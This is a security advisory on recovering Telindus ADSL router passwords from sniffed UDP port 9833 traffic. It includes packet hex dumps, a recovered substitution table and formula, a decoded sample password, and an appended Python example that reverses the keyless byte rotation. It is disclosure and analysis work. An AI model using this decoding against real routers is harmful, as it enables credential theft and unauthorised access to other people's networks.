COMMAND

Telindus password recovery due to weak encryption scheme

SYSTEMS AFFECTED

Telindus ADSL router 112x, firmware release 6.0.x

PROBLEM

In Elia Florio's "ioProgrammo" [http://www.edmaster.it/ioprogrammo] [eflorio@edmaster.it] advisory:

An old security problem for the Telindus 112x series (and Arescom NetDSL 1000 too) is well documented here:

http://www.tigerteam.it/files/telindus-advisory.txt (English)
http://www.tigerteam.it/files/telindus-advisory.IT.txt (Italian)

There is a new exploit to crack the router password, partially based on this old problem, which was fixed by Telindus by introducing a new firmware release (6.0.x), where the UDP packets over port 9833 (containing the plain-text password) are encrypted, to ensure product security. However, after some study, I discovered that the encryption scheme is trivial and can be broken using some information which the router itself reveals (the router name) to the user.

NOTE: The encryption scheme was successfully decrypted on 2 routers supplied by different ISPs: MATAV (Hungary) and Telecom (Italy), both with 6.0.x firmware.

[---------------------------------------------------------------------]

PROOF OF CONCEPT:

Using a sniffer I captured an (encrypted) packet from a 1124 router and compared it with another (unencrypted) packet taken from another router, which has the old firmware (< 6.0.x). This procedure (how to capture the packet) was explained in a previous security advisory (by others) and is based on UDP sniffing over port 9833 while "Telindus 9100 M. Application" is trying to contact the router over the LAN.
CIPHER-TEXT

0100  00 03 02 00 08 00 00 A2 A3 2B 63 4B 73 23 AB 99  .........+cKs#..
0110  02 0A 22 9A 61 02 93 7B AB A3 2B 90 08 08 00 2B  ..".a..{..+....+
0120  6B 7B AB 9B 28 08 10 01 92 72 22 99 89 91 B1 82  k{..(....r".....
0130  42 29 6A A2 62 49 61 03 B3 2B 91 01 B1 71 81 71  B)j.bIa..+...q.q
0140  91 B9 DA A3 AB 29 02 53 AB 61 01 99 81 01 89 C9  .....).S.a......
0150  D1 89 B1 D1 99 B1 01 91 81 81 90 09 98 00 10 01  ................
0160  E0 08 98 00 30 00 2E C0 9F 0A 88 08 B0 00 30 00  ....0.........0.
0170  85 38 9A 64 0A 00 18 00 10 00 02 00 20 00 10 00  .8.d........ ...
0180  00 09 30 00 00 09 38 00 00 09 40 00 00 09 80 00  ..0...8...@.....
0190  10 00 10 0A 20 00 00 08 20 00 10 00 00 10 50 00  .... ... .....P.
01A0  10 00 00 0A 30 00 10 00 00 0A 48 00 20 00 00 00  ....0.....H. ...
01B0  00 0A 88 00 02 10 28 00 02 11 10 00 00 20 40 00  ......(...... @.

PLAIN-TEXT

0100  00 03 00 01 01 00 00 05 44 53 4C 30 30 01 01 00  ........DSL00...
0110  0D 31 31 31 31 31 31 31 31 31 31 31 31 31 01 02  .1111111111111..
0120  00 32 4E 44 31 30 36 30 56 45 2D 54 4C 49 2C 20  .2ND1060VE-TLI, 
0130  76 65 72 20 35 2E 33 2E 31 31 42 3B 54 68 75 20  ver 5.3.11B;Thu 
0140  44 65 63 20 20 36 20 31 36 3A 33 36 3A 33 33 20  Dec  6 16:36:33 
0150  32 30 30 31 01 33 00 02 00 3C 01 13 00 06 00 60  2001.3...<.....`
0160  6C 1D BD 7E 01 16 00 06 00 00 86 60 62 F7 04 08  l..~.......`b...
0170  00 02 00 01 04 15 00 02 00 FF 01 0D 00 04 00 00  ................
0180  00 00 01 0E 00 04 00 00 00 00 01 14 00 02 00 00  ................
0190  40 03 00 02 00 00 40 04 00 02 00 00 01 26 00 00  @.....@......&..
01A0  01 27 00 00 01 28 00 00 01 30 00 02 00 02 01 44  .'...(...0.....D
01B0  00 00 42 05 00 00 42 22 00 00 04 18 00 00 08 FF  ..B...B"........

Both payloads begin with the byte sequence "00 03 xx xx xx 00 00".
In the plain packet we can read the router name and the password: the beginning of a text string has an important byte, which stores the string length:

05 44 53 4C 30 30 01 01 00
^^----------------------------------> length of string "DSL00"

0D 31 31 31 31 31 31 31 31 31 31 31 31 31 01 02 00
^^----------------------------------> length of string "1111111111111"

I suppose that "0x 0x 00" is a kind of termination sequence for the <router name> and <password> fields.

Now look at the encrypted packet: because its total length is similar to that of the plain packet (>200 bytes), I suppose that "A2" is now an encrypted length byte, so the router name field begins after this byte. But I know the router name, because Telindus 9100 M. Application shows it to me during the connection test with the router. In this case it was "Telindus ADSL Router", very long! I think that is enough to begin a cryptanalytic attack on the packet.

"Telindus ADSL Router" [20 bytes = 14 hex]   crypto-length = A2

T  e  l  i  n  d  u  s     A  D  S  L     R  o  u  t  e  r
A3 2B 63 4B 73 23 AB 99 02 0A 22 9A 61 02 93 7B AB A3 2B 90   encrypted
54 65 6C 69 6E 64 75 73 20 41 44 53 4C 20 52 6F 75 74 65 72   plain ASCII

Looking at this, I suppose that:

1) the encryption scheme is based on a fixed crypto system ("e", "u", "t" are encrypted the same way throughout the text)
2) there is a special encryption for stop/mark bytes between words (add -2 or -3 to the final char? R=93 / r=90 ????)
3) the encryption scheme is case sensitive

Trying to write a crypto table, I notice that every letter is coded from the previous one by adding "8" to the crypto-byte. For example r=93, then s=9B...

CRYPTO TABLE (hex codes)
-------------------------------------
CHAR   CRYPT   PLAIN
a      0B      61
b      13      62
c      1B      63
d      23      64
e      2B      65
f      33      66
g      3B      67
h      43      68
i      4B      69
j      53      6A
k      5B      6B
l      63      6C
m      6B      6D
n      73      6E
o      7B      6F
p      83      70
q      8B      71
r      93      72
s      9B      73
t      A3      74
u      AB      75
v      B3      76
w      BB      77
x      C3      78
y      CB      79
z      D3      7A
...
1      89      31
2      91      32
3      98      33
...
I think that the encryption function is very similar to this:

ENCRYPT(x) = x*8 + int(x/20h) - (int(x/20h))*100h

For example ("q" = 71h):

ENCRYPT(71h) = 71h*8 + 71h/20h - (71h/20h)*100h = 388h + 3 - 300h = 8Bh

There are some encryption variants for blank space, capitals and the last letters of words.

Now, where is the router password in the encrypted packet? After 20 bytes (the router name length in this case) there is "08 08 00", probably a field marker, then there is 2B, which is the crypto-length of the password. The encrypted password string begins there. Using the table, I can unmask the real router password:

   m  o  u  s  e
2B 6B 7B AB 9B 28 08 10 01
^^---------------------------------- crypto length of password

Other information can also be decrypted:

N  D  S  1  2  6  0  H  E  -  T  L  I
72 22 99 89 91 B1 82 42 29 6A A2 62 49 61 03

v  e  r     6  .  0  .  2  7  ;  T  u  e     J  u  l     3  0
B3 2B 91 01 B1 71 81 71 91 B9 DA A3 AB 29 02 53 AB 61 01 99 81 01

1  9  :  1  6  :  3  6     2  0  0  2
89 C9 D1 89 B1 D1 99 B1 01 91 81 81 90 09 98 00 10 01

[----------------------------------------------------------------------]

SOLUTION

n/a
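The following is an added example, not part of the advisory, that checks the ENCRYPT(x) formula above against the crypto table and shows why the scheme gives no confidentiality: the formula is exactly an 8-bit left rotation by 3, a fixed keyless permutation of the 256 byte values, so its inverse (rotate right by 3) is known to anyone who reads the firmware or, as here, one captured packet. The byte strings at the bottom are copied from the advisory's own decoding of the capture; the end-of-word variants the advisory mentions are not modelled.

```python
# Added example, not the advisory's code: the advisory's ENCRYPT(x) formula,
# its equivalence to an 8-bit rotate-left by 3, the inverse, and a check
# against the advisory's crypto table.

def encrypt_byte(x: int) -> int:
    """The advisory's formula: x*8 + int(x/20h) - int(x/20h)*100h.

    high = x // 0x20 is the 3 top bits; x*8 - high*0x100 == (x & 0x1F) * 8,
    so the result is already in 0..255 and the mask below changes nothing.
    """
    high = x // 0x20
    return (x * 8 + high - high * 0x100) & 0xFF

def rol3(x: int) -> int:
    """The same map written as a rotate-left by 3 over 8 bits."""
    return ((x << 3) | (x >> 5)) & 0xFF

def decrypt_byte(c: int) -> int:
    """Inverse: rotate-right by 3. No key is involved."""
    return ((c >> 3) | (c << 5)) & 0xFF

def formula_is_rol3() -> bool:
    return all(encrypt_byte(x) == rol3(x) for x in range(256))

def is_keyless_permutation() -> bool:
    """A fixed bijection on bytes: every ciphertext byte has exactly one plaintext."""
    outputs = sorted(encrypt_byte(x) for x in range(256))
    inverts = all(decrypt_byte(encrypt_byte(x)) == x for x in range(256))
    return outputs == list(range(256)) and inverts

# Entries copied from the advisory's CRYPTO TABLE: char -> crypted byte.
TABLE = {"a": 0x0B, "q": 0x8B, "r": 0x93, "s": 0x9B, "t": 0xA3,
         "z": 0xD3, "1": 0x89, "2": 0x91}

def table_matches_formula() -> bool:
    return all(encrypt_byte(ord(ch)) == c for ch, c in TABLE.items())

def decrypt_bytes(data: bytes) -> str:
    """Apply the inverse byte by byte (plain letters and digits only)."""
    return "".join(chr(decrypt_byte(c)) for c in data)

# Bytes quoted in the advisory's decoding of the captured packet.
PASSWORD_BODY = bytes.fromhex("6B 7B AB 9B")  # "mous" (final byte uses a word-end variant)
TIME_DIGITS = bytes.fromhex("89 C9 D1 89 B1")  # "19:16"

if __name__ == "__main__":
    print(formula_is_rol3(), is_keyless_permutation(), table_matches_formula())
    print(decrypt_bytes(PASSWORD_BODY), decrypt_bytes(TIME_DIGITS))
```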